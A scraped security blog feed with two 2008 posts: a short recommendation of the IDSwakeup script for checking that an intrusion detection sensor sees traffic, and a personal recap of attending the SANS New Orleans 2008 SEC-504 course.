ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-66215853171841317412008-01-30T01:35:00.000-05:002008-01-30T01:52:06.907-05:00Testing your IDSIs that SPAN still up? Am I seeing the traffic that I need to? <a href="http://www.hsc.fr/ressources/outils/idswakeup/index.html.en">IDSwakeup</a> from Herve Schauer Consultants, is a small script the is worth a try. You will have to have hping2 installed as a prereq.<br /><br /> Usage: ./IDSwakeup src_addr dst_addr [nb] [ttl]<br /><br />IDSwakeup should light the average sensor up like an Xmas Tree.Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0tag:blogger.com,1999:blog-4508217951330976703.post-71224067954304743282008-01-26T20:00:00.001-05:002008-12-11T03:50:15.820-05:00Sans New Orleans 2008<a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAEniQCmbBp6Ui1-EGu8SMGcrSPSay76q9ybW3Ei4I6XWBhN7xjeIINGc9_hrPgHUXjvUOX4MCgS1m8ETX5NetFXT1nB7g8Mrezb6npeZw8VyDZtEN9RJiTdMIzGKlxn03aGYYOWTtvH1b/s1600-h/IMG00109.jpg"><img style="float:right; margin:0 0 10px 10px;cursor:pointer; cursor:hand;" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAEniQCmbBp6Ui1-EGu8SMGcrSPSay76q9ybW3Ei4I6XWBhN7xjeIINGc9_hrPgHUXjvUOX4MCgS1m8ETX5NetFXT1nB7g8Mrezb6npeZw8VyDZtEN9RJiTdMIzGKlxn03aGYYOWTtvH1b/s320/IMG00109.jpg" border="0" alt=""id="BLOGGER_PHOTO_ID_5159959975772235394" /></a><br /><br /><br />Last week, I attended the latest Sans Institute conference in New Orleans. All in all it was a great experience. It seems like the city is on its way back. I sat through SEC-504 Advanced Hacker Techniques and Incident Handling, and yes I'll be taking the exam for the Cert. The course was originally scheduled to be taught by the one and only Ed Skoudis; known for books he has authored including "Counterhack" and "Counterhack Reloaded". Upon arrival, I was disappointed to find out that Ed would not be teaching, but a guy by the name of John Strand; Ed was in the lab working on what has become the new Sans Penetration Testing / Ethical Hacking course. Well, no need to worry, John did not disappoint,I listened to him vomit knowledge for 6 days, eight hours each day, non-stop. My hat is off to all of the Sans instructors they are hands down the most professional and knowledgeable in the field. Check out <a href="http://www.john-strand.com">John Strand's website</a> he has some pretty good video tutorials on it.<br /><br />Thank you New Orleans <br />Love that City!Court Graham, CISSP, OSCP, C|EH, PCI-QSA, ITILhttp://www.blogger.com/profile/12137980462590589771noreply@blogger.com0